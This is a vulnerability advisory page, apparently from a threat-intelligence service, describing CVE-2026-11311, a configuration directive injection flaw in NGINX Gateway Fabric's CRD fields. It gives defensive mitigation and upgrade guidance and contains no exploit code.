Unrated

NGINX Gateway Fabric configuration directive injection via CRD fields

IdentifiersCVE-2026-11311CWE-74

CVE-2026-11311 is a high-severity injection vulnerability in the NGINX configuration generator component of NGINX Gateway Fabric when NGINX Plus is configured as the data plane. The flaw arises because user-controlled string values from the NginxProxy Custom Resource Definition (CRD) serverTokens field and the AuthenticationFilter CRD extraAuthArgs field are rendered directly into generated NGINX configuration templates without proper sanitization or escaping. An authenticated attacker with permission to create or modify these CRDs can supply crafted values that inject arbitrary NGINX configuration directives into the generated configuration. The issue is described as a control-plane vulnerability; the trigger is through management-plane configuration rather than direct data-plane request handling.

For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows an authenticated attacker with CRD modification rights to alter the generated NGINX configuration by injecting arbitrary directives. Based on the provided content, this can lead to unauthorized proxy behavior, exposure of sensitive data from the NGINX pod filesystem, proxying or redirecting traffic to attacker-controlled endpoints, and denial of service if the injected configuration prevents NGINX from reloading or causes service instability. The primary security impact is compromise of configuration integrity with consequential confidentiality, integrity, and availability effects in Kubernetes environments using NGINX Gateway Fabric.

Mitigation

If you can’t patch tonight, do this now.

Until patches are applied, restrict permission to create or modify the affected Custom Resource Definitions to trusted administrators only, specifically the NginxProxy serverTokens field and the AuthenticationFilter extraAuthArgs field. Review RBAC assignments in the Kubernetes cluster to minimize who can alter these resources, and monitor generated NGINX configuration and reload failures for signs of abuse. If feasible, avoid exposing untrusted users to workflows that can influence these CRD fields.

Remediation

Patch, then assume compromise.

Upgrade NGINX Gateway Fabric to a fixed release. The provided content states affected versions include 2.3.0 through 2.6.3, with fixes in version 2.6.4. Remediation also requires correcting the configuration generator logic so that user-supplied values from the NginxProxy serverTokens field and AuthenticationFilter extraAuthArgs field are properly sanitized and escaped before being rendered into NGINX configuration templates. Software versions that have reached End of Technical Support were not evaluated.

PUBLIC EXPLOITS

Exploits

No public exploits tracked yet. Mallory keeps watching.

VALID 0 / 0 TOTALView more in app

No public exploit code observed for this vulnerability.

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType

F5Nginx Gateway Fabricapplication

F5Nginx Plusapplication

NginxGateway Fabricapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

ACTIVITY FEED

Recent activity

10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

10 SOURCESView more in app

thecybersecguruNews

Jun 19, 2026

CVE-2026-42530 & CVE-2026-42055: NGINX RCE Flaws Explained | The CyberSec Guru

A high-severity configuration injection vulnerability in NGINX Gateway Fabric caused by insufficient validation of CRD fields related to OIDC extra arguments and server-token handling, allowing authenticated users with CRD modification rights to inject arbitrary NGINX directives.

thecybersecguruNews

Jun 19, 2026

CVE-2026-42530 & CVE-2026-42055: NGINX RCE Flaws Explained | The CyberSec Guru

A high-severity authenticated configuration-injection vulnerability in NGINX Gateway Fabric caused by insufficient CRD validation, allowing arbitrary NGINX directive injection.

security affairsNews

Jun 18, 2026

F5 Patches Critical NGINX Vulnerabilities Enabling Unauthenticated Code Execution - Security Affairs

A high-severity vulnerability in NGINX Gateway Fabric that could allow authenticated attackers to inject arbitrary NGINX configuration directives.

cyber security newsNews

Jun 18, 2026

F5 Patches NGINX Vulnerability That Enables Code Execution and DoS Attacks

A high-severity vulnerability in NGINX Gateway Fabric that could lead to service instability or unauthorized behavior in Kubernetes-based environments.

+3 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.

Start free trial

Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware

Malware families riding this exploit, with evidence and IOCs.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity1

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES

MITRE CVE

cve.org · CVE-2026-11311

NVD

nvd.nist.gov/vuln/detail/CVE-2026-11311

MITRE CWE · CWE-74

cwe.mitre.org